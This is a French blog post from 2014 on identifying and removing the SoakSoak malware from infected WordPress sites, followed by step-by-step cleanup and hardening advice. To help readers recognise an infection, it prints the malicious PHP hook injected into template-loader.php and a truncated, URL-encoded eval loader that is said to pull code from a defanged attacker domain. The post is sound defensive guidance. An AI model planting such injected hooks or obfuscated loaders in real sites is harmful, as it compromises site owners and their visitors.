Comment réparer les sites infectés par le malware SoakSoak

Depuis l’annonce, dimanche dernier, que plus de 100.000 sites WordPress avait été infectés par le malware SoakSoak, de nombreux possesseurs de sites WordPress se posent la question de savoir comment désinfecter leurs sites.

SoakSoak a infecté plus de 100.000 sites WordPress

Bien que les raisons de la vulnérabilités des sites infectés n’ait pas encore été précisée, il est fort probable que cette infection soit en rapport avec la vulnérabilité critique de Slider Revolution,

Alors, que faire si vous êtes déjà infecté par ce malware?

Voici une méthode de désinfection qui a permis, à de nombreux sites, d’être à nouveaux fonctionnels, malgré le manque de sauvegardes récentes.

Site infecté par SoakSoak

Lisez la suite pour en savoir plus sur la façon de désinfecter un site touché par le malware SoakSoak.

Comment identifier un site infecté par SoakSoak

SoakSoak semble utiliser la vulnérabilité critique de Slider Revolution comme point d’entrée, puis télécharge, par une porte dérobée, le code qui infecte tous les sites qui partagent le même compte au niveau du serveur. Cela signifie que des sites qui n’utilisent pas le plugin Slider Revolution peuvent également être infectés. L’infection se compose de deux fichiers:

  • wp-includes/js/swfobject.js – Les pirates insèrent un code chiffré qui charge un script malveillant depuis hxxp: // soaksoak . ru / xteas / code (SoakSoak).
  • wp-includes/template-loader.php – Dans ce fichier, les pirates ajoutent le code qui infectera chaque page du site WordPress depuis swobject.js.

Cependant, le code n’est pas toujours celui de SoakSoak, de même qu’il y a parfois plus de deux fichiers. Sur certains sites, il existe une variante de ce malware.

En premier lieu, vous devez déterminer si vous avez effectivement été infecté par le malware soaksoak ou pas. Pour cela, il faut trouver des fichiers suspects. Le malware modifie le fichier wp-includes / template-loader.php afin d’y inclure le code suivant:

<?php
function FuncQueueObject()
{
 wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');

Cette modification provoque, pour chaque page consultée sur le site,  l’inclusion au fichier wp-includes/js/swobject.js, du code malveillant suivant:

eval(decodeURIComponent 
("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));

Lorsque cette fonction est décodée, elle télécharge depuis le domaine SoakSoack. ru une autre partie de code qui infectera la totalité du site.

Si vous trouvez ce code dans vos pages ou si vous avez des doutes sur la sécurité de votre site, vous pouvez utiliser le scanner de sécurité gratuit fourni par Sucuri.

Scanner Sucuri-SoakSoak

Comment désinfecter un site infecté par SoakSoak: Les étapes

Pour désinfecter un site WordPress touché par ce malware, il vous faut suivre les étapes suivantes, dans l’ordre exact:

  1. Téléchargez le fichier zip de WordPress depuis le site officielle de WordPress.org
  2. Extraire le fichier sur votre bureau et copier le dossier wp-includes dans la mémoire de l’ordinateur
  3. Connectez-vous à votre compte d’hébergement et rendez-vous dans le gestionnaire de fichiers, pour vous positionner dans le répertoire où votre site est hébergé. Supprimez le dossier wp-includes de votre site et remplacez le par le wp-includes que vous avez extrait du fichier zip que vous avez téléchargé depuis le site officielle de WordPress.org
  4. Videz tous les caches existants, ceux des plugin (WP Rocket, W3 Total Cache, WP SuperCache, etc…), ainsi que ceux des CDN (comme MaxCDN, Cloudflare, Google PageSpeed ​​etc…)
  5. Vérifiez à nouveau votre site dans un navigateur dont vous aurez, au préalable, vidé le cache, ouvrez une fenêtre incognito pour voir si le malware existe encore ou pas. Une fois que vous avez terminé de supprimer SoakSoak, il est temps de renforcer votre site.
  6. Installez le plugin iThemes Security pour WordPress et configurer le grâce aux vidéos du site iThemes
  7. Utilisez le filtrage de DNS grâce à des services comme Cloudflare ou en utilisant un pare-feu compatible, cela pourra vous protéger contre de futures attaques.

Il a été démontré que le malware cible également les navigateurs FireFox et la dernière version d’Internet Explorer (11), ce qui suggère qu’ils ciblent certaines vulnérabilités récentes dans ces navigateurs. Si vous les utilisez, assurez-vous d’appliquer tous les derniers correctifs de sécurité et envisagez de désactiver le contenu actif (par exemple, utilisez NoScript dans Firefox).

Cette variante infecte également  » wp-includes / template-loader.php « (même code) et » wp-includes / js / swfobject.js « (presque le même code crypté), mais au lieu de charger le code malveillants depuis soaksoak. ru, le code dans swfobject.js crée un objet Flash qui utilise le fichier « wp-includes / js / swfobjct.swf » pour infecter les sites.


 

Maintenant que vous savez comment sécuriser votre site Web du malware SoakSoak, n’oubliez pas de partager cet article avec vos amis ou des personnes que vous connaissez qui pourraient être souffrir de cette attaque de malware.

Si vous avez des doutes ou des questions ou souhaitez ajouter une autre méthode sur la façon de réparer les sites infectés par SoakSoak, n’hésitez pas à commenter ci-dessous!


Cet article vous semble utile? Partagez le, Merci!

Publié à l'origine le : 17 décembre 2014 @ 15 h 49 min

Pour compléter votre lecture.